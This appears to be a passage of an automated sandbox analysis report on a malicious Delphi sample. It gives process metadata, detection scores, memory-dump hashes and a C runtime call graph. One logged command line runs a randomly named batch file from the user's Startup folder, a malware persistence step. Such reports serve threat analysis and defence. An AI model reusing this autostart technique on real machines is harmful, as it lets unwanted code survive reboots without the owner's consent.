File size:1'828'864 bytes
MD5 hash:EEE5DDCFFBED16222CAC0A1B4E2E466E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:Borland Delphi
Yara matches:
• Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000002E.00000002.4470759393.0000000000401000.00000040.00000001.01000000.0000002B.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 75%, ReversingLabs
Has exited:false

Target ID:47
Start time:03:31:41
Start date:11/03/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6V1VrzZlnckbDLDx3vI2CQTI.bat" "
Imagebase:0x7ff7e4260000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:48
                                                                                                                                                                                                                                                            Start time:03:31:43
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:false
                                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                                            Target ID:173
                                                                                                                                                                                                                                                            Start time:03:33:50
                                                                                                                                                                                                                                                            Start date:11/03/2024
                                                                                                                                                                                                                                                            Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                            Wow64 process (32bit):
                                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                            Imagebase:
                                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                            Has elevated privileges:
                                                                                                                                                                                                                                                            Has administrator privileges:
                                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: ffeeaa30e7dcb7e1d7b290b0bb6bf0e5408dacd55836ce58f092581b31e83eb7
                                                                                                                                                                                                                                                              • Instruction ID: 0db8051f7d7c2a4f60bdd0a5e4dc0121bbeadbf243fa9d0dda683659b7587adc
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffeeaa30e7dcb7e1d7b290b0bb6bf0e5408dacd55836ce58f092581b31e83eb7
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 51F09C317043446FD706A768986096A7FBEFFCA6107054479E50DCB356DD198C0A97A1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 6b9ddf0c221e49258ceda8a681ff97ad7b16ba8609f07e8a6c999cbca77222d2
                                                                                                                                                                                                                                                              • Instruction ID: 8a6c836b84a46b8b61f3eb873ec97d927b5c7d5fef147ff72d42329ab9eb8fed
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6b9ddf0c221e49258ceda8a681ff97ad7b16ba8609f07e8a6c999cbca77222d2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98417470A002058FCB59DF68C554BAEBBF2EF88344F14856DE805AB395DB349D42CB91
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: ca7b26d0b55b6f7bcfca7e12a1f6bc9e98af2715c8794efbe811f3d728b96f95
                                                                                                                                                                                                                                                              • Instruction ID: bff5ae66bbbd4d00d6e636cca747c58a4de304e5b9f48116450a2921870993f6
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca7b26d0b55b6f7bcfca7e12a1f6bc9e98af2715c8794efbe811f3d728b96f95
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D417370A002058FCB09EB68C554BAEBBF2EF88340F248469E805AB395DB759D42CB91
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: b6b8a9487980b3264c43ead0b3e73c0703a2cf4f5e8c57fad2c2a22f1a5e49e2
                                                                                                                                                                                                                                                              • Instruction ID: d0de6c3be53b2f5bec1aaba2a97c72e66bf7ea4019d5377eecfb4f7bf12ceea2
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b6b8a9487980b3264c43ead0b3e73c0703a2cf4f5e8c57fad2c2a22f1a5e49e2
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6F217C307082858FCB0FD778C95065E7F63EFD2344B14445ED8859B2E6CB205D06C712
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 5d4aaa5b07ade15ee718e201799d86778c0b2c05c7794b64f9c54fe799610456
                                                                                                                                                                                                                                                              • Instruction ID: fc489f3170cdf3c69eacb9c7dc0210aee14f5e0e8190b6e6a93d64158834df56
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d4aaa5b07ade15ee718e201799d86778c0b2c05c7794b64f9c54fe799610456
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 911102717453851FC307A778AC6496B7FE9EBC221031A40BFD045CB2A6EA688C06C761
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 013d42d4bfbcfd6dacb8f8973f90eb2227dba55dbd015647d58d5ead825701b3
                                                                                                                                                                                                                                                              • Instruction ID: 572af857cf0d4fe501f8752dd9f8ddce2e9077b097462d282b6e3015232bb37c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 013d42d4bfbcfd6dacb8f8973f90eb2227dba55dbd015647d58d5ead825701b3
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EC119E70A40209CBCB59EF68C9557AF76B2BB88244F21056CE402E73A4DB714E028BD1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 83a2152a10e4571cf0f5885baa3c9c1b410849396148aed269145b27f1a8dc73
                                                                                                                                                                                                                                                              • Instruction ID: 1e705e00bcefd01f466abeb78139c4b9518bb3ec7445bc4c95fef7b8b895e141
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 83a2152a10e4571cf0f5885baa3c9c1b410849396148aed269145b27f1a8dc73
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5117C70A40205CBDB19EB78C919BAF76B6BB88280F210568E002A73E4DF704E028BD5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 8853143c6e9151efb8f5bc56fb25f62586ca7a88cfbb00a37ba7ca29a4487419
                                                                                                                                                                                                                                                              • Instruction ID: a2550aa28428bd917ef02a68ff73af14a36cb3d785577c4abd004270013c1991
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8853143c6e9151efb8f5bc56fb25f62586ca7a88cfbb00a37ba7ca29a4487419
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1F04F7574030A6BC71ABB7AEC6492F7B9EEBC5690311413EE419CB399EE70DC058790
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: cd3fa3350160f5b84c76542c9bd46b89562a9a1ebfb8e8cf4c63b5dd31695366
                                                                                                                                                                                                                                                              • Instruction ID: f0e36b0e00bd866ce9726ac278cf25f23745411f2d785c485ae8867dde900ee0
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd3fa3350160f5b84c76542c9bd46b89562a9a1ebfb8e8cf4c63b5dd31695366
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6101F9707002158FC70AEB78D990AAEB7E3EFD4350B20842DD4169B3A5CF75AD06CB41
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 053a05870804af05c6b7bc28604ea22115aaf604fa1292fcb62a4f0d946a4850
                                                                                                                                                                                                                                                              • Instruction ID: 5c1d689eec02260cde41bad3b6941e55de55bf76e83153463181ef031ee825b8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 053a05870804af05c6b7bc28604ea22115aaf604fa1292fcb62a4f0d946a4850
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8CF0E9317443941FC746576CA8209FA3BB9DFC632470A00B7E409CB262DD184C0B87E2
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: 93a27f35fdf6cf6fc1db09f4758ee4767a2c5a5127455264331dbf30a6a3790d
                                                                                                                                                                                                                                                              • Instruction ID: ac5e2d9e94b04a65deb6cf79af7c6a2454117d4de9f86472cdd8c36ec5b1f3ec
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 93a27f35fdf6cf6fc1db09f4758ee4767a2c5a5127455264331dbf30a6a3790d
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7BF0E0222057411FC31B5B7A981045F7BEFEDD2650304497FC489CB665DD259C0A83D3
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              • Opcode ID: e4b5442bb067ae2711d321c9b7897fa8d2e4b98a399be641aae008a69f38f031
                                                                                                                                                                                                                                                              • Instruction ID: 8938715a4b889b28e00703451ab84806cfa138958e77675b29bdf35ba3de7316
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4b5442bb067ae2711d321c9b7897fa8d2e4b98a399be641aae008a69f38f031
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 86F01260704119CFDB19AB69C41472E72937F94788F114529D506AB3E9CF385D8287DA
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000005.00000002.4508494818.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_5_2_1600000_AddInProcess32.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                                                              Execution Coverage:5.4%
                                                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                              Signature Coverage:13.6%
                                                                                                                                                                                                                                                              Total number of Nodes:1510
                                                                                                                                                                                                                                                              Total number of Limit Nodes:53
6922 405595 6920->6922 6921->6759 6922->6921 6923 4055a4 VirtualFree HeapFree 6922->6923 6928 4039f0 6923->6928 6932 40518c LeaveCriticalSection 6925->6932 6927 402bb4 6927->6763 6929 403a08 6928->6929 6930 403a2f __VEC_memcpy 6929->6930 6931 403a37 6929->6931 6930->6931 6931->6921 6932->6927 6934 403dec __VEC_memzero 6933->6934 6934->6690 6936 4027b3 6935->6936 6937 4027b5 IsDebuggerPresent 6935->6937 6936->6693 6943 40653e 6937->6943 6940 4039b0 SetUnhandledExceptionFilter UnhandledExceptionFilter 6941 4039d5 GetCurrentProcess TerminateProcess 6940->6941 6942 4039cd __invoke_watson 6940->6942 6941->6693 6942->6941 6943->6940 6944->6538 6946 40a4ad 6945->6946 6947 40a4b4 6945->6947 6958 40a30a 6946->6958 6947->6579 6950 403041 6949->6950 6951 403039 6949->6951 6952 403d90 __write_nolock 67 API calls 6950->6952 6951->6950 6956 403068 6951->6956 6953 403046 6952->6953 6954 402f43 __write_nolock 4 API calls 6953->6954 6955 403055 6954->6955 6955->6584 6956->6955 6957 403d90 __write_nolock 67 API calls 6956->6957 6957->6953 6959 40a316 __ioinit 6958->6959 6989 4067bc 6959->6989 6963 40a329 7010 40a0e5 6963->7010 6966 409360 __malloc_crt 67 API calls 6967 40a34a 6966->6967 6968 40a469 __ioinit 6967->6968 7017 40a15f 6967->7017 6968->6947 6971 40a476 6971->6968 6975 40a489 6971->6975 6977 402b57 __freebuf 67 API calls 6971->6977 6972 40a37a InterlockedDecrement 6973 40a38a 6972->6973 6974 40a39b InterlockedIncrement 6972->6974 6973->6974 6979 402b57 __freebuf 67 API calls 6973->6979 6974->6968 6976 40a3b1 6974->6976 6978 403d90 __write_nolock 67 API calls 6975->6978 6976->6968 6981 405264 __lock 67 API calls 6976->6981 6977->6975 6978->6968 6980 40a39a 6979->6980 6980->6974 6983 40a3c5 InterlockedDecrement 6981->6983 6984 40a441 6983->6984 6985 40a454 InterlockedIncrement 6983->6985 6984->6985 6987 402b57 __freebuf 67 API calls 6984->6987 7026 40a46b 6985->7026 6988 40a453 6987->6988 6988->6985 6990 406739 __getptd_noexit 67 API calls 6989->6990 6991 4067c2 6990->6991 
6992 4067cf 6991->6992 6993 405f86 __amsg_exit 67 API calls 6991->6993 6994 40a041 6992->6994 6993->6992 6995 40a04d __ioinit 6994->6995 6996 4067bc __write_nolock 67 API calls 6995->6996 6997 40a052 6996->6997 6998 405264 __lock 67 API calls 6997->6998 6999 40a064 6997->6999 7000 40a082 6998->7000 7002 40a072 __ioinit 6999->7002 7004 405f86 __amsg_exit 67 API calls 6999->7004 7001 40a0cb 7000->7001 7005 40a0b3 InterlockedIncrement 7000->7005 7006 40a099 InterlockedDecrement 7000->7006 7029 40a0dc 7001->7029 7002->6963 7004->7002 7005->7001 7006->7005 7007 40a0a4 7006->7007 7007->7005 7008 402b57 __freebuf 67 API calls 7007->7008 7009 40a0b2 7008->7009 7009->7005 7033 40457e 7010->7033 7013 40a120 7015 40a125 GetACP 7013->7015 7016 40a112 7013->7016 7014 40a102 GetOEMCP 7014->7016 7015->7016 7016->6966 7016->6968 7018 40a0e5 getSystemCP 79 API calls 7017->7018 7019 40a17d 7018->7019 7020 40a1c3 _memset __setmbcp_nolock 7019->7020 7021 40a188 setSBCS 7019->7021 7022 40a1b0 GetCPInfo 7019->7022 7224 409eb7 GetCPInfo 7020->7224 7023 4027ab __putwch_nolock 5 API calls 7021->7023 7022->7020 7022->7021 7024 40a308 7023->7024 7024->6971 7024->6972 7387 40518c LeaveCriticalSection 7026->7387 7028 40a472 7028->6968 7032 40518c LeaveCriticalSection 7029->7032 7031 40a0e3 7031->6999 7032->7031 7034 40458d 7033->7034 7040 4045da 7033->7040 7035 4067bc __write_nolock 67 API calls 7034->7035 7036 404592 7035->7036 7037 4045ba 7036->7037 7041 40a752 7036->7041 7039 40a041 _LocaleUpdate::_LocaleUpdate 69 API calls 7037->7039 7037->7040 7039->7040 7040->7013 7040->7014 7042 40a75e __ioinit 7041->7042 7043 4067bc __write_nolock 67 API calls 7042->7043 7044 40a763 7043->7044 7045 40a791 7044->7045 7047 40a775 7044->7047 7046 405264 __lock 67 API calls 7045->7046 7048 40a798 7046->7048 7049 4067bc __write_nolock 67 API calls 7047->7049 7056 40a714 7048->7056 7050 40a77a 7049->7050 7053 40a788 __ioinit 7050->7053 7055 405f86 __amsg_exit 67 API calls 7050->7055 7053->7037 7055->7053 
7057 40a718 7056->7057 7058 40a74a 7056->7058 7057->7058 7059 40a602 ___addlocaleref 8 API calls 7057->7059 7064 40a7bc 7058->7064 7060 40a72b 7059->7060 7060->7058 7067 40a688 7060->7067 7223 40518c LeaveCriticalSection 7064->7223 7066 40a7c3 7066->7050 7068 40a710 7067->7068 7069 40a691 InterlockedDecrement 7067->7069 7068->7058 7081 40a4c2 7068->7081 7070 40a6a7 InterlockedDecrement 7069->7070 7071 40a6aa 7069->7071 7070->7071 7072 40a6b4 InterlockedDecrement 7071->7072 7073 40a6b7 7071->7073 7072->7073 7074 40a6c1 InterlockedDecrement 7073->7074 7075 40a6c4 7073->7075 7074->7075 7076 40a6ce InterlockedDecrement 7075->7076 7078 40a6d1 7075->7078 7076->7078 7077 40a6e6 InterlockedDecrement 7077->7078 7078->7077 7079 40a6f6 InterlockedDecrement 7078->7079 7080 40a6ff InterlockedDecrement 7078->7080 7079->7078 7080->7068 7082 40a543 7081->7082 7083 40a4d6 7081->7083 7084 40a590 7082->7084 7085 402b57 __freebuf 67 API calls 7082->7085 7083->7082 7091 402b57 __freebuf 67 API calls 7083->7091 7107 40a50a 7083->7107 7094 40a5b7 7084->7094 7135 40c89b 7084->7135 7087 40a564 7085->7087 7089 402b57 __freebuf 67 API calls 7087->7089 7095 40a577 7089->7095 7090 402b57 __freebuf 67 API calls 7096 40a538 7090->7096 7097 40a4ff 7091->7097 7092 402b57 __freebuf 67 API calls 7092->7094 7093 40a5f6 7098 402b57 __freebuf 67 API calls 7093->7098 7094->7093 7100 402b57 67 API calls __freebuf 7094->7100 7101 402b57 __freebuf 67 API calls 7095->7101 7102 402b57 __freebuf 67 API calls 7096->7102 7111 40ca6b 7097->7111 7104 40a5fc 7098->7104 7099 402b57 __freebuf 67 API calls 7105 40a520 7099->7105 7100->7094 7106 40a585 7101->7106 7102->7082 7104->7058 7127 40ca2b 7105->7127 7109 402b57 __freebuf 67 API calls 7106->7109 7107->7099 7110 40a52b 7107->7110 7109->7084 7110->7090 7112 40ca74 7111->7112 7126 40caf1 7111->7126 7113 402b57 __freebuf 67 API calls 7112->7113 7115 40ca85 7112->7115 7113->7115 7114 40ca97 7117 40caa9 7114->7117 7118 402b57 __freebuf 67 API calls 7114->7118 
